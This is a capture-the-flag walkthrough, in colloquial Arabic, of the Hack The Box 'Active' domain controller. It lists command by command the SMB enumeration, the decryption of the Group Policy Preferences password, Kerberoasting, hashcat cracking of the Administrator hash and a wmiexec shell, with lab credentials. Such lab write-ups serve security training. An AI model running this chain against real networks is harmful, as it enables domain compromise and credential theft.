Active - بالعربي

Recon

nmap

nmap -sV -sC -p- 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 07:46 EDT
Nmap scan report for 10.10.10.100
Host is up (0.41s latency).
Not shown: 65512 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-13 12:43:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 33m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-13T12:44:51
|_ start_date: 2021-05-13T12:19:24
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1473.41 seconds

SMB

smbmap & smbclient

smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS

عنا READ ONLY على ال Replication فخلينا نشوفها

smbclient //10.10.10.100/Replication
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5728531 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
10459647 blocks of size 4096. 5728531 blocks available

رح نزل كلشي, باستخدام الاوامر هي

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

بعد مانزلو بحثت جوا الملفات و لعبت شوي المهم وصلت ل Policies و بالاخر ملف Groups.xml, بمجرد ما شفتهم عرفت ان هي GPP او Group Policy Preferences و هدول عبارة مجموعة من ال Group Policy و بتكون على جهة المستخدم او بسموها client-side و هي الي بتوصل الاعدادات للاجهزة البتكون تابعة لل domain.

هي بكون فيها اسماء مستخدمين و كلمات سر فإذا رحت لهون

active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

و فتحت الملف هاد رح تلاقي هيدا الكود

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

اذا لاحظت في name و كمان cpassword و هي بتكون مشفرة بتشفير AES فلازم نكسر التشفير او crack و فينا نستخدم اداة اسمها gpp-decrypt.py (اضغط هنا!)

python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Password: GPPstillStandingStrong2k18

هيك حصلنا كلمة سر, هاد الشيء رائع على فكرة لازم تحتفل ياصديقي, جرب نط من الشباك

CREDS: svc_tgs:GPPstillStandingStrong2k18

MSRPC

rpcclient -U "" -N 10.10.10.100
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

بعد ما شفت رسالة ال NT_STATUS_ACCESS_DENIED قلت مافي فائدة ترجى و ال LDAP ما كتير الصراحة اهتميت فقلت اروح مباشرة لمرحلة اني ادخل عل ماشين Get Acess و للاسف هاد الشي مانجح فرجعت مرة تانية لل SMB مع ال creds الحصلناها

SMB with svc_tgs

smbclient //10.10.10.100/Users -U 'svc_tgs'
Enter WORKGROUP\svc_tgs's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5728499 blocks available

طبعا حملت كلشي متل ما عملنا من قبل

So much time on DAT files

بعد ما حملتهم, و كنت مخلص كل الفوق باقل من 10د قعدت بحلل ملفات الدات هي لكم ساعة و ابحث و اقرأ و بالاخر طلعت ولا شي او على الاقل انا ماحصلت شي, طبعا لازم اتخطى الموضوع رغم اني قلبي انكسر بس لازم تتخطى و تروح للمرحلة البعدها

Kerberoasting

يلا Kerberoasting ❤

impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

ازا صار و حصلت رسالة خطأ كلاتي:

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

استخدم هي الاداة, المشكلة بتنزامن الوقت بينك و بين الهدف

ntpdate 10.10.10.100

عموما حصلنا ال TGT

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$f3549302f6dd2e829e0b67a08c8f68f014bea465fc1d0c5fe21e9bed19023293dd073c0dc586f2966bb40dcf2b562e98cfd957cec08bb7c72bb70fc7f6c8a046491637edc5f0fb647ee580bd73efb5393bb0edc16127345a2c4a3308daf69337ed33a0171cd16cb25bec00272ee67eaf45e729c60162ad274d73229f67a3824466a179d4f9b27e9aee2f4cce2c9dfd71047dc701db1c2d9c35b7dee5f66c4c9b8104025483f5c8da703b8b02681ec555e1beaac0bc191ac8f4076a298485402dc8d2906d78aa2beaee5be930d1019a651475224ae20e83f74da92402cb6448a38265c89a225c7389576f5498152e7e19624508be412500ee832a321662f3b3270720d38b3827c32b5bed9fee4308b32cb04dcf6321dc6d4a13cbf447c100f765d2b5d9cff2c0c5829f1e81c689760bdec97b5e68ced8f644bccca83cb12545f583b39c67886692fca4023ce9a00bac2c14d2b5da844a9cabad5df166bf58216b0fd10d6a48e1c65c3680162c1a55e8d08558cb952e115c009bf73e37a969610e5851ce44c54a90443da67efa34581769b9529f596a55f4d114504f398a359d21ad8af6d824a8bfd7fb97820db023d4b01021ac3fffe59734f2f96ea981fa9a460c968de8c8d8b2cb2c4dccc34998f55b15dfa2a98e998268fea835b87b6720aed1b4c3b5c08e7fcc8d88699b346a00f2f7f1e4424503fc9448cf3f309247ed393f2abbb0e0b01d55c4a7882eac246b6e27586a0494bb87e6e6e467a466366478690c7fde07106cacf656ca9f83a16c5199c314abbfa2a8a5ef4af6b34038ec6ff3593884d21182a93478554fcf25ecdfc1d9487437292fd517377858603bb7e05296b7737ead17ee182c632b97e4c0c23872af2f731919fb9aa954a710f8f5a7a0216dfdd8deeaaadcefddbeec69d88d7b644859e47fdf2c7deec748028a978957104632e87021411fb06ecff4e579441933d5a7ba9bf422b2834cdf9fe4988eb6e394ea3b2b20eecdd7fc4c25f4dae66d090417288700b385036d16ca373d146820a10d2404192701595f22660900b1f7ad2145a7bb13ae3db3ae5ba70c41a6787f3baf48e8d844b43a95d7665281a18e5ea64b7d0f7b15b4188278f64452f8c5a3d1f8e11f79b4420d1b87f7c987533486fb763a96b1209d5d7684254560952b478b7ac26ddb2bc8ff89c4734d06c627f9ad423710a242de08c6b5ba683f440a66bdba3abb563abb532a444b226422c934c2c7a4ab6f61ae30

نكسرها ب hashcat

hashcat.exe -m 13100 admin_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$f3549302f6dd2e829e0b67a08c8f68f014bea465fc1d0c5fe21e9bed19023293dd073c0dc586f2966bb40dcf2b562e98cfd957cec08bb7c72bb70fc7f6c8a046491637edc5f0fb647ee580bd73efb5393bb0edc16127345a2c4a3308daf69337ed33a0171cd16cb25bec00272ee67eaf45e729c60162ad274d73229f67a3824466a179d4f9b27e9aee2f4cce2c9dfd71047dc701db1c2d9c35b7dee5f66c4c9b8104025483f5c8da703b8b02681ec555e1beaac0bc191ac8f4076a298485402dc8d2906d78aa2beaee5be930d1019a651475224ae20e83f74da92402cb6448a38265c89a225c7389576f5498152e7e19624508be412500ee832a321662f3b3270720d38b3827c32b5bed9fee4308b32cb04dcf6321dc6d4a13cbf447c100f765d2b5d9cff2c0c5829f1e81c689760bdec97b5e68ced8f644bccca83cb12545f583b39c67886692fca4023ce9a00bac2c14d2b5da844a9cabad5df166bf58216b0fd10d6a48e1c65c3680162c1a55e8d08558cb952e115c009bf73e37a969610e5851ce44c54a90443da67efa34581769b9529f596a55f4d114504f398a359d21ad8af6d824a8bfd7fb97820db023d4b01021ac3fffe59734f2f96ea981fa9a460c968de8c8d8b2cb2c4dccc34998f55b15dfa2a98e998268fea835b87b6720aed1b4c3b5c08e7fcc8d88699b346a00f2f7f1e4424503fc9448cf3f309247ed393f2abbb0e0b01d55c4a7882eac246b6e27586a0494bb87e6e6e467a466366478690c7fde07106cacf656ca9f83a16c5199c314abbfa2a8a5ef4af6b34038ec6ff3593884d21182a93478554fcf25ecdfc1d9487437292fd517377858603bb7e05296b7737ead17ee182c632b97e4c0c23872af2f731919fb9aa954a710f8f5a7a0216dfdd8deeaaadcefddbeec69d88d7b644859e47fdf2c7deec748028a978957104632e87021411fb06ecff4e579441933d5a7ba9bf422b2834cdf9fe4988eb6e394ea3b2b20eecdd7fc4c25f4dae66d090417288700b385036d16ca373d146820a10d2404192701595f22660900b1f7ad2145a7bb13ae3db3ae5ba70c41a6787f3baf48e8d844b43a95d7665281a18e5ea64b7d0f7b15b4188278f64452f8c5a3d1f8e11f79b4420d1b87f7c987533486fb763a96b1209d5d7684254560952b478b7ac26ddb2bc8ff89c4734d06c627f9ad423710a242de08c6b5ba683f440a66bdba3abb563abb532a444b226422c934c2c7a4ab6f61ae30:Ticketmaster1968

و هيك حصلنا اخر creds بدنا هي

CREDS: Administrator:Ticketmaster1968

‍Get Access

هلق باستخدام اداة wmiexec فينا ندخل على الماشين

wmiexec.py 'active.htb/Administrator:[email protected]'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
C:\>

اداة wmiexec بتستخدم ال wmi protocol و الي هو قسم من مجموعة ادوات الادارة لمابكروسوفت بوفرلك نوع من الادارة و المراقبة بشكل اساسي و بزودك بمعلومات عن انظمة و يندوز كمان فينك تكتبله ادوات و اشياء automation بمتل VBScript و powershell. لهون منكون خلصنا, سلام!

Happy Hacking MHZ-Cyber